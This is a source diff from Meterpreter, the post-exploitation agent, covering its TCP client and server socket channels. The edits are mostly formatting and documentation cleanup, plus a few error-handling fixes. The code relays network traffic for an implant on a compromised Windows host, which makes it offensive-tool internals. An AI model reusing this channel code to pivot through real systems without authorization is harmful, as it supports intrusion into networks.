@ -104,14 +125,18 @@ DWORD tcp_channel_client_close(Channel *channel, Packet *request, LPVOID context
return ERROR_SUCCESS;
}
/*
* Callback for when there is data available on the local side of the TCP client connection
/*!
* @brief Callback for when there is data available on the local side of the TCP client connection.
* @param remote Pointer to the remote that will receive the data.
* @param ctx Pointer to the TCP client context.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS This value is always returned.
*/
DWORD tcp_channel_client_local_notify( Remote * remote, TcpClientContext * ctx )
DWORD tcp_channel_client_local_notify(Remote * remote, TcpClientContext * ctx)
{
struct timeval tv = {0};
fd_set set = {0};
UCHAR buf[16384] = {0};
struct timeval tv = { 0 };
fd_set set = { 0 };
UCHAR buf[16384] = { 0 };
LONG dwBytesRead = 0;
// We select in a loop with a zero second timeout because it's possible
@ -121,83 +146,85 @@ DWORD tcp_channel_client_local_notify( Remote * remote, TcpClientContext * ctx )
do
{
// Reset the notification event
ResetEvent( ctx->notify );
ResetEvent(ctx->notify);
FD_ZERO( &set );
FD_SET( ctx->fd, &set );
tv.tv_sec = 0;
FD_ZERO(&set);
FD_SET(ctx->fd, &set);
tv.tv_sec = 0;
tv.tv_usec = 0;
// Read data from the client connection
dwBytesRead = recv( ctx->fd, buf, sizeof(buf), 0 );
if( dwBytesRead == SOCKET_ERROR )
dwBytesRead = recv(ctx->fd, buf, sizeof(buf), 0);
if (dwBytesRead == SOCKET_ERROR)
{
DWORD dwError = WSAGetLastError();
// WSAECONNRESET: The connection was forcibly closed by the remote host.
// WSAECONNABORTED: The connection was terminated due to a time-out or other failure.
if( dwError == WSAECONNRESET || dwError == WSAECONNABORTED )
if (dwError == WSAECONNRESET || dwError == WSAECONNABORTED)
{
dprintf( "[TCP] tcp_channel_client_local_notify. [error] closing down channel gracefully. WSAGetLastError=%d", dwError );
dprintf("[TCP] tcp_channel_client_local_notify. [error] closing down channel gracefully. WSAGetLastError=%d", dwError);
// By setting bytesRead to zero, we can ensure we close down the channel gracefully...
dwBytesRead = 0;
}
else if( dwError == WSAEWOULDBLOCK )
else if (dwError == WSAEWOULDBLOCK)
{
dprintf( "[TCP] tcp_channel_client_local_notify. channel=0x%08X. recv generated a WSAEWOULDBLOCK", ctx->channel );
dprintf("[TCP] tcp_channel_client_local_notify. channel=0x%08X. recv generated a WSAEWOULDBLOCK", ctx->channel);
// break and let the scheduler notify us again if needed.
break;
}
else
{
dprintf( "[TCP] tcp_channel_client_local_notify. [error] channel=0x%08X read=0x%.8x (ignored). WSAGetLastError=%d", ctx->channel, dwBytesRead, dwError );
dprintf("[TCP] tcp_channel_client_local_notify. [error] channel=0x%08X read=0x%.8x (ignored). WSAGetLastError=%d", ctx->channel, dwBytesRead, dwError);
// we loop again because bytesRead is -1.
}
}
if( dwBytesRead == 0 )
if (dwBytesRead == 0)
{
dprintf( "[TCP] tcp_channel_client_local_notify. [closed] channel=0x%08X read=0x%.8x", ctx->channel, dwBytesRead );
dprintf("[TCP] tcp_channel_client_local_notify. [closed] channel=0x%08X read=0x%.8x", ctx->channel, dwBytesRead);
// Set the native channel operations context to NULL
channel_set_native_io_context( ctx->channel, NULL );
channel_set_native_io_context(ctx->channel, NULL);
// Sleep for a quarter second
Sleep( 250 );
Sleep(250);
// Free the context
free_tcp_client_context( ctx );
free_tcp_client_context(ctx);
// Stop processing
break;
}
else if( dwBytesRead > 0 )
else if (dwBytesRead > 0)
{
if( ctx->channel )
if (ctx->channel)
{
dprintf( "[TCP] tcp_channel_client_local_notify. [data] channel=0x%08X read=%d", ctx->channel, dwBytesRead );
channel_write( ctx->channel, ctx->remote, NULL, 0, buf, dwBytesRead, 0 );
dprintf("[TCP] tcp_channel_client_local_notify. [data] channel=0x%08X read=%d", ctx->channel, dwBytesRead);
channel_write(ctx->channel, ctx->remote, NULL, 0, buf, dwBytesRead, 0);
}
else
{
dprintf( "[TCP] tcp_channel_client_local_notify. [data] channel=<invalid> read=0x%.8x", dwBytesRead );
dprintf("[TCP] tcp_channel_client_local_notify. [data] channel=<invalid> read=0x%.8x", dwBytesRead);
}
}
} while( select( 1, &set, NULL, NULL, &tv ) > 0 );
} while (select(1, &set, NULL, NULL, &tv) > 0);
return ERROR_SUCCESS;
}
/*
* Allocates a streaming TCP channel
*
* TLVs:
*
* req: TLV_TYPE_HOST_NAME - The host to connect to
* req: TLV_TYPE_PORT - The port to connect to
/*!
* @brief Allocates a streaming TCP channel.
* @param remote Pointer to the remote instance.
* @param packet Pointer to the request packet.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS Opening of the channel succeeded.
* @remarks The request packet needs to contain:
* - \c TLV_TYPE_HOST_NAME - Host to connnect to.
* - \c TLV_TYPE_PORT - Port to connnect to.
*/
DWORD request_net_tcp_client_channel_open(Remote *remote, Packet *packet)
{
@ -211,15 +238,19 @@ DWORD request_net_tcp_client_channel_open(Remote *remote, Packet *packet)
{
// No response packet?
if (!response)
{
break;
}
// Extract the hostname and port that we are to connect to
host = packet_get_tlv_value_string(packet, TLV_TYPE_PEER_HOST);
port = packet_get_tlv_value_uint(packet, TLV_TYPE_PEER_PORT);
// Open the TCP channel
if ((result = create_tcp_client_channel(remote, host, (USHORT)(port & 0xffff), &channel)) != ERROR_SUCCESS)
{
break;
}
// Set the channel's identifier on the response
packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(channel));
@ -232,10 +263,14 @@ DWORD request_net_tcp_client_channel_open(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
/*
* Creates a connection to a remote host and builds a logical channel to
* represent it.
*
/*!
* @brief Creates a connection to a remote host and builds a logical channel to represent it.
* @param remote Pointer to the remote instance.
* @param remoteHost The remote host to connect to.
* @param remoteHost The remote port to connect to.
* @param outChannel Pointer that will receive the newly created channel.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS Creation of the TCP client was successful.
*/
DWORD create_tcp_client_channel(Remote *remote, LPCSTR remoteHost, USHORT remotePort, Channel **outChannel)
{
@ -247,9 +282,11 @@ DWORD create_tcp_client_channel(Remote *remote, LPCSTR remoteHost, USHORT remote
SOCKET clientFd = 0;
if (outChannel)
{
*outChannel = NULL;
}
dprintf( "[TCP] create_tcp_client_channel. host=%s, port=%d", remoteHost, remotePort );
dprintf("[TCP] create_tcp_client_channel. host=%s, port=%d", remoteHost, remotePort);
do
{
@ -257,14 +294,13 @@ DWORD create_tcp_client_channel(Remote *remote, LPCSTR remoteHost, USHORT remote
if ((clientFd = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0)) == INVALID_SOCKET)
{
clientFd = 0;
result = GetLastError();
result = GetLastError();
break;
}
s.sin_family = AF_INET;
s.sin_port = htons(remotePort);
s.sin_addr.s_addr = inet_addr(remoteHost);
s.sin_family = AF_INET;
s.sin_port = htons(remotePort);
s.sin_addr.s_addr = inet_addr(remoteHost);
// Resolve the host name locally
if (s.sin_addr.s_addr == (DWORD)-1)
@ -280,17 +316,22 @@ DWORD create_tcp_client_channel(Remote *remote, LPCSTR remoteHost, USHORT remote
memcpy(&s.sin_addr.s_addr, h->h_addr, h->h_length);
}
dprintf( "[TCP] create_tcp_client_channel. host=%s, port=%d connecting...", remoteHost, remotePort );
dprintf("[TCP] create_tcp_client_channel. host=%s, port=%d connecting...", remoteHost, remotePort);
// Try to connect to the host/port
if (connect(clientFd, (struct sockaddr *)&s, sizeof(s)) == SOCKET_ERROR)
{
result = GetLastError();
#ifdef _WIN32
result = WSAGetLastError();
#else
result = errno;
#endif
dprintf("[TCP] create client failed host=%s, port=%d error=%u 0x%x", remoteHost, remotePort, result, result);
break;
}
dprintf( "[TCP] create_tcp_client_channel. host=%s, port=%d connected!", remoteHost, remotePort );
dprintf("[TCP] create_tcp_client_channel. host=%s, port=%d connected!", remoteHost, remotePort);
// Allocate the client context for tracking the connection
if (!(ctx = (TcpClientContext *)malloc( sizeof(TcpClientContext))))
if (!(ctx = (TcpClientContext *)malloc(sizeof(TcpClientContext))))
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
@ -300,80 +341,90 @@ DWORD create_tcp_client_channel(Remote *remote, LPCSTR remoteHost, USHORT remote
memset(ctx, 0, sizeof(TcpClientContext));
ctx->remote = remote;
ctx->fd = clientFd;
ctx->fd = clientFd;
// Initialize the channel operations structure
memset(&chops, 0, sizeof(chops));
chops.native.context = ctx;
chops.native.write = tcp_channel_client_write;
chops.native.close = tcp_channel_client_close;
chops.native.write = tcp_channel_client_write;
chops.native.close = tcp_channel_client_close;
dprintf( "[TCP] create_tcp_client_channel. host=%s, port=%d creating the channel", remoteHost, remotePort );
dprintf("[TCP] create_tcp_client_channel. host=%s, port=%d creating the channel", remoteHost, remotePort);
// Allocate an uninitialized channel for associated with this connection
if (!(channel = channel_create_stream(0, 0,&chops)))
if (!(channel = channel_create_stream(0, 0, &chops)))
{
result = ERROR_NOT_ENOUGH_MEMORY;
break;
}
// Save the channel context association
ctx->channel = channel;
// Finally, create a waitable event and insert it into the scheduler's
// waitable list
dprintf( "[TCP] create_tcp_client_channel. host=%s, port=%d creating the notify", remoteHost, remotePort );
dprintf("[TCP] create_tcp_client_channel. host=%s, port=%d creating the notify", remoteHost, remotePort);
if ((ctx->notify = WSACreateEvent()))
{
WSAEventSelect(ctx->fd, ctx->notify, FD_READ|FD_CLOSE);
dprintf( "[TCP] create_tcp_client_channel. host=%s, port=%d created the notify %.8x", remoteHost, remotePort, ctx->notify );
WSAEventSelect(ctx->fd, ctx->notify, FD_READ | FD_CLOSE);
dprintf("[TCP] create_tcp_client_channel. host=%s, port=%d created the notify %.8x", remoteHost, remotePort, ctx->notify);
scheduler_insert_waitable( ctx->notify, ctx, NULL, (WaitableNotifyRoutine)tcp_channel_client_local_notify, NULL);
scheduler_insert_waitable(ctx->notify, ctx, NULL, (WaitableNotifyRoutine)tcp_channel_client_local_notify, NULL);
}
} while (0);
dprintf( "[TCP] create_tcp_client_channel. host=%s, port=%d all done", remoteHost, remotePort );
dprintf("[TCP] create_tcp_client_channel. host=%s, port=%d all done", remoteHost, remotePort);
// Clean up on failure
if (result != ERROR_SUCCESS)
{
dprintf( "[TCP] create_tcp_client_channel. host=%s, port=%d cleaning up failed connection", remoteHost, remotePort );
dprintf("[TCP] create_tcp_client_channel. host=%s, port=%d cleaning up failed connection", remoteHost, remotePort);
if (ctx)
{
free_tcp_client_context(ctx);
}
if (clientFd)
{
closesocket(clientFd);
}
channel = NULL;
}
if (outChannel)
{
*outChannel = channel;
}
return result;
}
/*
* Deallocates and cleans up the attributes of a socket context
/*!
* @brief Deallocates and cleans up the attributes of a socket context.
* @ctx Pointer to the socket context to free.
*/
VOID free_socket_context(SocketContext *ctx)
{
dprintf( "[TCP] free_socket_context. ctx=0x%08X", ctx );
dprintf("[TCP] free_socket_context. ctx=0x%08X", ctx);
// Close the socket and notification handle
if (ctx->fd){
if (ctx->fd)
{
closesocket(ctx->fd);
ctx->fd = 0;
}
if (ctx->channel) {
if (ctx->channel)
{
channel_close(ctx->channel, ctx->remote, NULL, 0, NULL);
ctx->channel = NULL;
}
if (ctx->notify)
{
dprintf( "[TCP] free_socket_context. remove_waitable ctx=0x%08X notify=0x%08X", ctx, ctx->notify);
dprintf("[TCP] free_socket_context. remove_waitable ctx=0x%08X notify=0x%08X", ctx, ctx->notify);
// The scheduler calls CloseHandle on our WSACreateEvent() for us
scheduler_signal_waitable(ctx->notify, Stop);
ctx->notify = NULL;
@ -383,41 +434,53 @@ VOID free_socket_context(SocketContext *ctx)
free(ctx);
}
/*
* Shuts the socket down for either reading or writing based on the how
* parameter supplied by the remote side
/*!
* @brief Shuts the socket down for either reading or writing.
* @param remote Pointer to the remote instance.
* @param packet Pointer to the packet.
* @remark The contents of the \c packet indicate whether to stop reading or writing.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS This value is always returned.
*/
DWORD request_net_socket_tcp_shutdown(Remote *remote, Packet *packet)
{
DWORD dwResult = ERROR_SUCCESS;
Packet * response = NULL;
DWORD dwResult = ERROR_SUCCESS;
Packet * response = NULL;
SocketContext * ctx = NULL;
Channel * channel = NULL;
DWORD cid = 0;
DWORD how = 0;
Channel * channel = NULL;
DWORD cid = 0;
DWORD how = 0;
do
{
dprintf( "[TCP] entering request_net_socket_tcp_shutdown" );
response = packet_create_response( packet );
if( !response )
BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. response == NULL", ERROR_NOT_ENOUGH_MEMORY );
dprintf("[TCP] entering request_net_socket_tcp_shutdown");
response = packet_create_response(packet);
if (!response)
{
BREAK_WITH_ERROR("[TCP] request_net_socket_tcp_shutdown. response == NULL", ERROR_NOT_ENOUGH_MEMORY);
}
cid = packet_get_tlv_value_uint( packet, TLV_TYPE_CHANNEL_ID );
how = packet_get_tlv_value_uint( packet, TLV_TYPE_SHUTDOWN_HOW );
cid = packet_get_tlv_value_uint(packet, TLV_TYPE_CHANNEL_ID);
how = packet_get_tlv_value_uint(packet, TLV_TYPE_SHUTDOWN_HOW);
channel = channel_find_by_id( cid );
if( !response )
BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. channel == NULL", ERROR_INVALID_HANDLE );
channel = channel_find_by_id(cid);
if (!response)
{
BREAK_WITH_ERROR("[TCP] request_net_socket_tcp_shutdown. channel == NULL", ERROR_INVALID_HANDLE);
}
dprintf( "[TCP] request_net_socket_tcp_shutdown. channel=0x%08X, cid=%d", channel, cid );
dprintf("[TCP] request_net_socket_tcp_shutdown. channel=0x%08X, cid=%d", channel, cid);
ctx = channel_get_native_io_context( channel );
if( !ctx )
BREAK_WITH_ERROR( "[TCP] request_net_socket_tcp_shutdown. ctx == NULL", ERROR_INVALID_HANDLE );
ctx = channel_get_native_io_context(channel);
if (!ctx)
{
BREAK_WITH_ERROR("[TCP] request_net_socket_tcp_shutdown. ctx == NULL", ERROR_INVALID_HANDLE);
}
if( shutdown( ctx->fd, how ) == SOCKET_ERROR )
BREAK_ON_WSAERROR( "[TCP] request_net_socket_tcp_shutdown. shutdown failed" );
if (shutdown(ctx->fd, how) == SOCKET_ERROR)
{
BREAK_ON_WSAERROR("[TCP] request_net_socket_tcp_shutdown. shutdown failed");
}
// sf: we dont seem to need to call this here, as the channels tcp_channel_client_local_notify() will
// catch the socket closure and call free_socket_context() for us, due the the FD_READ|FD_CLOSE flags
@ -425,11 +488,11 @@ DWORD request_net_socket_tcp_shutdown(Remote *remote, Packet *packet)
// This avoids a double call (from two different threads) and subsequent access violation in some edge cases.
//free_socket_context( ctx );
} while( 0 );
} while (0);
packet_transmit_response( dwResult, remote, response );
packet_transmit_response(dwResult, remote, response);
dprintf("[TCP] leaving request_net_socket_tcp_shutdown");
dprintf( "[TCP] leaving request_net_socket_tcp_shutdown" );
return ERROR_SUCCESS;
}

435
c/meterpreter/source/extensions/stdapi/server/net/socket/tcp_server.c
View File

@ -1,119 +1,146 @@
/*!
* @file tcp_server.c
* @brief
*/
#include "precomp.h"
#include "tcp.h"
/*
* Deallocates and cleans up the attributes of a tcp server socket context
/*!
* @brief Deallocates and cleans up the attributes of a tcp server socket context.
* @param ctx Pointer to the context to free.
*/
VOID free_tcp_server_context( TcpServerContext * ctx )
VOID free_tcp_server_context(TcpServerContext * ctx)
{
do
{
if( !ctx )
break;
dprintf( "[TCP-SERVER] free_tcp_server_context. ctx=0x%08X", ctx );
if( ctx->fd )
if (!ctx)
{
closesocket( ctx->fd );
break;
}
dprintf("[TCP-SERVER] free_tcp_server_context. ctx=0x%08X", ctx);
if (ctx->fd)
{
closesocket(ctx->fd);
ctx->fd = 0;
}
if( ctx->channel )
if (ctx->channel)
{
channel_close( ctx->channel, ctx->remote, NULL, 0, NULL );
channel_close(ctx->channel, ctx->remote, NULL, 0, NULL);
ctx->channel = NULL;
}
if( ctx->notify )
if (ctx->notify)
{
scheduler_signal_waitable( ctx->notify, Stop );
scheduler_signal_waitable(ctx->notify, Stop);
ctx->notify = NULL;
}
free( ctx );
free(ctx);
} while( 0 );
} while (0);
}
/*
* Closes the server socket and brings down the client connections.
/*!
* @brief Closes the server socket and brings down the client connections.
* @param channel Pointer to the TCP channel to close.
* @param request The request packet.
* @param context The channel context.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS This value is always returned.
*/
DWORD tcp_channel_server_close( Channel * channel, Packet * request, LPVOID context )
DWORD tcp_channel_server_close(Channel * channel, Packet * request, LPVOID context)
{
TcpServerContext * ctx = (TcpServerContext *)context;
do
{
dprintf( "[TCP-SERVER] tcp_channel_server_close. channel=0x%08X, ctx=0x%08X", channel, ctx );
dprintf("[TCP-SERVER] tcp_channel_server_close. channel=0x%08X, ctx=0x%08X", channel, ctx);
if( !ctx )
if (!ctx)
{
break;
}
// Set the context channel to NULL so we don't try to close the
// channel (since it's already being closed)
ctx->channel = NULL;
// Free the context
free_tcp_server_context( ctx );
free_tcp_server_context(ctx);
// Set the native channel operations context to NULL
channel_set_native_io_context( channel, NULL );
channel_set_native_io_context(channel, NULL);
} while( 0 );
} while (0);
return ERROR_SUCCESS;
}
/*
* Create a TCP client channel from a socket.
/*!
* @brief Create a TCP client channel from a socket.
* @param serverCtx Pointer to the TCP server context.
* @param sock The socket handle.
* @returns Pointer to the newly created client context.
*/
TcpClientContext * tcp_channel_server_create_client( TcpServerContext * serverctx, SOCKET sock )
TcpClientContext * tcp_channel_server_create_client(TcpServerContext * serverCtx, SOCKET sock)
{
DWORD dwResult = ERROR_SUCCESS;
DWORD dwResult = ERROR_SUCCESS;
TcpClientContext * clientctx = NULL;
StreamChannelOps chops = {0};
StreamChannelOps chops = { 0 };
do
{
if( !serverctx )
BREAK_WITH_ERROR( "[TCP-SERVER] tcp_channel_server_create_client. serverctx == NULL", ERROR_INVALID_HANDLE );
if (!serverCtx)
{
BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. serverCtx == NULL", ERROR_INVALID_HANDLE);
}
clientctx = (TcpClientContext *)malloc( sizeof(TcpClientContext) );
if( !clientctx )
BREAK_WITH_ERROR( "[TCP-SERVER] tcp_channel_server_create_client. clientctx == NULL", ERROR_NOT_ENOUGH_MEMORY );
clientctx = (TcpClientContext *)malloc(sizeof(TcpClientContext));
if (!clientctx)
{
BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. clientctx == NULL", ERROR_NOT_ENOUGH_MEMORY);
}
memset( clientctx, 0, sizeof(TcpClientContext) );
memset(clientctx, 0, sizeof(TcpClientContext));
clientctx->remote = serverctx->remote;
clientctx->fd = sock;
clientctx->remote = serverCtx->remote;
clientctx->fd = sock;
clientctx->notify = WSACreateEvent();
if( clientctx->notify == WSA_INVALID_EVENT )
BREAK_ON_WSAERROR( "[TCP-SERVER] tcp_channel_server_create_client. WSACreateEvent failed" );
if (clientctx->notify == WSA_INVALID_EVENT)
{
BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_create_client. WSACreateEvent failed");
}
if( WSAEventSelect( clientctx->fd, clientctx->notify, FD_READ|FD_CLOSE ) == SOCKET_ERROR )
BREAK_ON_WSAERROR( "[TCP-SERVER] tcp_channel_server_create_client. WSAEventSelect failed" );
if (WSAEventSelect(clientctx->fd, clientctx->notify, FD_READ | FD_CLOSE) == SOCKET_ERROR)
{
BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_create_client. WSAEventSelect failed");
}
memset( &chops, 0, sizeof(StreamChannelOps) );
memset(&chops, 0, sizeof(StreamChannelOps));
chops.native.context = clientctx;
chops.native.write = tcp_channel_client_write;
chops.native.close = tcp_channel_client_close;
clientctx->channel = channel_create_stream( 0, 0, &chops );
if( !clientctx->channel )
BREAK_WITH_ERROR( "[TCP-SERVER] tcp_channel_server_create_client. clientctx->channel == NULL", ERROR_INVALID_HANDLE );
chops.native.write = tcp_channel_client_write;
chops.native.close = tcp_channel_client_close;
dwResult = scheduler_insert_waitable( clientctx->notify, clientctx, NULL, (WaitableNotifyRoutine)tcp_channel_client_local_notify, NULL );
} while( 0 );
if( dwResult != ERROR_SUCCESS )
{
if( clientctx )
clientctx->channel = channel_create_stream(0, 0, &chops);
if (!clientctx->channel)
{
free( clientctx );
BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_create_client. clientctx->channel == NULL", ERROR_INVALID_HANDLE);
}
dwResult = scheduler_insert_waitable(clientctx->notify, clientctx, NULL, (WaitableNotifyRoutine)tcp_channel_client_local_notify, NULL);
} while (0);
if (dwResult != ERROR_SUCCESS)
{
if (clientctx)
{
free(clientctx);
clientctx = NULL;
}
}
@ -121,178 +148,250 @@ TcpClientContext * tcp_channel_server_create_client( TcpServerContext * serverct
return clientctx;
}
/*
* Notify routine for a tcp server channel to pick up its new client connections.
/*!
* @brief Notify routine for a tcp server channel to pick up its new client connections..
* @param remote Pointer to the remote instance.
* @param serverCtx Pointer to the TCP server context.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS Notification completed successfully.
*/
DWORD tcp_channel_server_notify( Remote * remote, TcpServerContext * serverctx )
DWORD tcp_channel_server_notify(Remote * remote, TcpServerContext * serverCtx)
{
DWORD dwResult = ERROR_SUCCESS;
DWORD dwResult = ERROR_SUCCESS;
TcpClientContext * clientctx = NULL;
Packet * request = NULL;
SOCKADDR_IN clientaddr = {0};
SOCKADDR_IN serveraddr = {0};
SOCKET sock = 0;
DWORD size = 0;
char * localhost = NULL;
char * peerhost = NULL;
int localport = 0;
int peerport = 0;
Packet * request = NULL;
SOCKADDR_IN clientaddr = { 0 };
SOCKADDR_IN serveraddr = { 0 };
SOCKET sock = 0;
DWORD size = 0;
char * localhost = NULL;
char * peerhost = NULL;
int localport = 0;
int peerport = 0;
do
{
if( !serverctx )
BREAK_WITH_ERROR( "[TCP-SERVER] tcp_channel_server_notify. serverctx == NULL", ERROR_INVALID_HANDLE );
ResetEvent( serverctx->notify );
size = sizeof(SOCKADDR);
sock = accept( serverctx->fd, (SOCKADDR *)&clientaddr, &size );
if( sock == INVALID_SOCKET )
if (!serverCtx)
{
if( WSAGetLastError() == WSAEWOULDBLOCK )
BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_notify. serverCtx == NULL", ERROR_INVALID_HANDLE);
}
ResetEvent(serverCtx->notify);
size = sizeof(SOCKADDR_IN);
sock = accept(serverCtx->fd, (SOCKADDR *)&clientaddr, &size);
if (sock == INVALID_SOCKET)
{
if (WSAGetLastError() == WSAEWOULDBLOCK)
{
Sleep( 100 );
Sleep(100);
break;
}
BREAK_ON_WSAERROR( "[TCP-SERVER] tcp_channel_server_notify. accept failed" );
BREAK_ON_WSAERROR("[TCP-SERVER] tcp_channel_server_notify. accept failed");
}
dprintf( "[TCP-SERVER] tcp_channel_server_notify. Got new client connection on channel %d. sock=%d", channel_get_id(serverctx->channel), sock );
dprintf("[TCP-SERVER] tcp_channel_server_notify. Got new client connection on channel %d. sock=%d", channel_get_id(serverCtx->channel), sock);
clientctx = tcp_channel_server_create_client(serverCtx, sock);
if (!clientctx)
{
BREAK_WITH_ERROR("[TCP-SERVER] tcp_channel_server_notify. clientctx == NULL", ERROR_INVALID_HANDLE);
}
clientctx = tcp_channel_server_create_client( serverctx, sock );
if( !clientctx )
BREAK_WITH_ERROR( "[TCP-SERVER] tcp_channel_server_notify. clientctx == NULL", ERROR_INVALID_HANDLE );
size = sizeof(SOCKADDR);
if( getsockname( serverctx->fd, (SOCKADDR *)&serveraddr, &size ) == SOCKET_ERROR )
BREAK_ON_WSAERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. getsockname failed" );
if (getsockname(serverCtx->fd, (SOCKADDR *)&serveraddr, &size) == SOCKET_ERROR)
{
BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. getsockname failed");
}
localhost = inet_ntoa( serveraddr.sin_addr );
if( !localhost )
localhost = inet_ntoa(serveraddr.sin_addr);
if (!localhost)
{
localhost = "";
}
localport = ntohs( serveraddr.sin_port );
localport = ntohs(serveraddr.sin_port);
peerhost = inet_ntoa( clientaddr.sin_addr );
if( !peerhost )
peerhost = inet_ntoa(clientaddr.sin_addr);
if (!peerhost)
{
peerhost = "";
}
peerport = ntohs( clientaddr.sin_port );
dprintf( "[TCP-SERVER] tcp_channel_server_notify. New connection %s:%d <- %s:%d", localhost, localport, peerhost, peerport );
peerport = ntohs(clientaddr.sin_port);
request = packet_create( PACKET_TLV_TYPE_REQUEST, "tcp_channel_open" );
if( !request )
BREAK_WITH_ERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. packet_create failed", ERROR_INVALID_HANDLE );
packet_add_tlv_uint( request, TLV_TYPE_CHANNEL_ID, channel_get_id(clientctx->channel) );
packet_add_tlv_uint( request, TLV_TYPE_CHANNEL_PARENTID, channel_get_id(serverctx->channel) );
packet_add_tlv_string( request, TLV_TYPE_LOCAL_HOST, localhost );
packet_add_tlv_uint( request, TLV_TYPE_LOCAL_PORT, localport );
packet_add_tlv_string( request, TLV_TYPE_PEER_HOST, peerhost );
packet_add_tlv_uint( request, TLV_TYPE_PEER_PORT, peerport );
dprintf("[TCP-SERVER] tcp_channel_server_notify. New connection %s:%d <- %s:%d", localhost, localport, peerhost, peerport);
dwResult = packet_transmit( serverctx->remote, request, NULL );
request = packet_create(PACKET_TLV_TYPE_REQUEST, "tcp_channel_open");
if (!request)
{
BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. packet_create failed", ERROR_INVALID_HANDLE);
}
} while( 0 );
packet_add_tlv_uint(request, TLV_TYPE_CHANNEL_ID, channel_get_id(clientctx->channel));
packet_add_tlv_uint(request, TLV_TYPE_CHANNEL_PARENTID, channel_get_id(serverCtx->channel));
packet_add_tlv_string(request, TLV_TYPE_LOCAL_HOST, localhost);
packet_add_tlv_uint(request, TLV_TYPE_LOCAL_PORT, localport);
packet_add_tlv_string(request, TLV_TYPE_PEER_HOST, peerhost);
packet_add_tlv_uint(request, TLV_TYPE_PEER_PORT, peerport);
dwResult = packet_transmit(serverCtx->remote, request, NULL);
} while (0);
return dwResult;
}
/*
* Allocates a streaming TCP server channel
/*!
* @brief Allocates a streaming TCP server channel.
* @param remote Pointer to the remote instance.
* @param packet Pointer to the request packet.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS Opening the server channel completed successfully.
*/
DWORD request_net_tcp_server_channel_open( Remote * remote, Packet * packet )
DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
{
DWORD dwResult = ERROR_SUCCESS;
DWORD dwResult = ERROR_SUCCESS;
TcpServerContext * ctx = NULL;
Packet * response = NULL;
char * lhost = NULL;
SOCKADDR_IN saddr = {0};
StreamChannelOps chops = {0};
USHORT lport = 0;
Packet * response = NULL;
char * lhost = NULL;
SOCKADDR_IN saddr = { 0 };
StreamChannelOps chops = { 0 };
USHORT lport = 0;
do
{
response = packet_create_response( packet );
if( !response )
BREAK_WITH_ERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. response == NULL", ERROR_NOT_ENOUGH_MEMORY );
ctx = (TcpServerContext *)malloc( sizeof(TcpServerContext) );
if( !ctx )
BREAK_WITH_ERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. ctx == NULL", ERROR_NOT_ENOUGH_MEMORY );
response = packet_create_response(packet);
if (!response)
{
BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. response == NULL", ERROR_NOT_ENOUGH_MEMORY);
}
ctx = (TcpServerContext *)malloc(sizeof(TcpServerContext));
if (!ctx)
{
BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. ctx == NULL", ERROR_NOT_ENOUGH_MEMORY);
}
memset(ctx, 0, sizeof(TcpServerContext));
memset( ctx, 0, sizeof(TcpServerContext) );
ctx->remote = remote;
lport = (USHORT)( packet_get_tlv_value_uint( packet, TLV_TYPE_LOCAL_PORT ) & 0xFFFF );
if( !lport )
BREAK_WITH_ERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. lport == NULL", ERROR_INVALID_HANDLE );
lport = (USHORT)(packet_get_tlv_value_uint(packet, TLV_TYPE_LOCAL_PORT) & 0xFFFF);
if (!lport)
{
BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. lport == NULL", ERROR_INVALID_HANDLE);
}
lhost = packet_get_tlv_value_string( packet, TLV_TYPE_LOCAL_HOST );
if( !lhost )
lhost = packet_get_tlv_value_string(packet, TLV_TYPE_LOCAL_HOST);
if (!lhost)
{
lhost = "0.0.0.0";
}
ctx->fd = WSASocket( AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0 );
if( ctx->fd == INVALID_SOCKET )
BREAK_ON_WSAERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. WSASocket failed" );
ctx->fd = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
if (ctx->fd == INVALID_SOCKET)
{
BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSASocket failed");
}
saddr.sin_family = AF_INET;
saddr.sin_port = htons( lport );
saddr.sin_addr.s_addr = inet_addr( lhost );
saddr.sin_family = AF_INET;
saddr.sin_port = htons(lport);
saddr.sin_addr.s_addr = inet_addr(lhost);
if( bind( ctx->fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR) ) == SOCKET_ERROR )
BREAK_ON_WSAERROR( "[TCP-SERVER] request_net_tcp_server_channel_open. bind failed" );
if (bind(ctx->fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR_IN)) == SOCKET_ERROR)
{
#ifdef _WIN32
dwResult = WSAGetLastError();
if (dwResult != WSAEADDRNOTAVAIL)
#else
dwResult = errno;
if (dwResult != EADDRNOTAVAIL)
#endif
{
BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed");
